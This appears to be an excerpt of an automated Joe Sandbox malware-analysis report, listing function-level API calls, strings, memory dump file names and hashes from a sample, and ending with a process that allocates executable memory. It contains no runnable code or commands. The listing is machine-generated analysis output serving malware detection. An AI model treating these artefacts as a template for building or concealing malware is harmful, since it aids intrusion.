EncodePointer.KERNEL32 ref: 00007FFE11BD5237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE11BD5283

Strings

RCC, xrefs: 00007FFE11BD5253
MOC, xrefs: 00007FFE11BD524B

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 6a9b57b0204c607158a75d70a33e26dcd5f3b5e1e87bb414a69c42c1563d3146
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 0C617D72908B85C5DB348F16E4407EAB7A4FB857A8F045265EB9D07B69CF7CD194CB00

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE11BDE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE11BDE473
WriteFile.KERNEL32 ref: 00007FFE11BDE73B
WriteFile.KERNEL32 ref: 00007FFE11BDE781
GetLastError.KERNEL32 ref: 00007FFE11BDE837

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 3c8bd93fa1957bdcec69ddb827ca69b4b500bdd580f80a3577898281ac0793a1
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: E9D1DF22B08E91C9EB24CF66D4406EC37A9FB447ACB405276DE5D97BA9DE3CD406C340

Function 00007FFE11BDED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE11BDED07), ref: 00007FFE11BDEE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE11BDED07), ref: 00007FFE11BDEEC3

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 101d83f82973a99eb2e80f41102781de78c9d5c1892628561a82be51ab56794e
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 2C91D732A18E61C5FB789F669440AFC2BA8AB047ACF1461B9DE0E576A5CF3CD442C700

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE11BD2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE11BD2244
GetCurrentThreadId.KERNEL32 ref: 00007FFE11BD2252
GetCurrentProcessId.KERNEL32 ref: 00007FFE11BD225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE11BD226E

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: c23dc7a563595dc914f30f82d0c8f5fa5109f1b35bc04c2b8c0a8e3e470d9742
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: B1114C22B19F01CAEB10CF61E8556A833A8F718768F041E71DA2D467A4DF7CD154C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE11BD5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11BD5C2A

Strings

csm, xrefs: 00007FFE11BD5DBE
csm, xrefs: 00007FFE11BD5C4F

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 6212f91a1a8868fd704baf9068bce8fcf0c478f3be03072b04b20b86efbf7212
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 1B71A172508A81CADB789F16D440BFD7BB4FB04BA9F04A175DE8C07AA9CB2CD451C740

Function 00007FFE11BD6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11BD6342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE11BD636B

Strings

csm, xrefs: 00007FFE11BD646B

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: f4b1c7bf56ec2181d2a75b6171ee0ec2d2e496a27afd5a8d31c1f6432897fe4d
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: B5515276619B41D6DB38AF16E0406AD77A8FB49BA8F101179DB8D07B66CF3CE451CB00

Function 00007FFE11BDEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE11BDEBA3
GetLastError.KERNEL32 ref: 00007FFE11BDEBC5

Strings

U, xrefs: 00007FFE11BDEB4F

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: e316532839768d0970d26a19a6ef4472063d4b33b05731837897097926b40cfe
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 1241D422B1DA51C1DB20CF66E4447A97765FB887A8F405031EE4E877A4DF3CE441C750

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE11BE0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11BD3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11BD3A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE11BE0993

Strings

csm, xrefs: 00007FFE11BE092B
f, xrefs: 00007FFE11BE0925

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: d6c7d8d6d3c8262334a31a0ccae55a75038006bc6768ff402c937e3c249b0aa1
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: C211E432B19B81C5EB249F17A0419AD6768EB44FD4F18A075EE8807B66CE3CD851CB00

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE11BD3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE11BD112F), ref: 00007FFE11BD39E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE11BD112F), ref: 00007FFE11BD3A21

Strings

csm, xrefs: 00007FFE11BD3A0E

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: d9c38e8c073a4056666c1a0312dd2e3ed491818d3870bc6d146baa234835f45b
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: 31115E3660DF4182EB648F16E40066977E9FB88B98F585270DE8D07769DF3CD551CB00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: mm3ujg.exePID: 2688, Parent PID: 6808COMMON

Executed Functions

Function 0233017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 023301DF
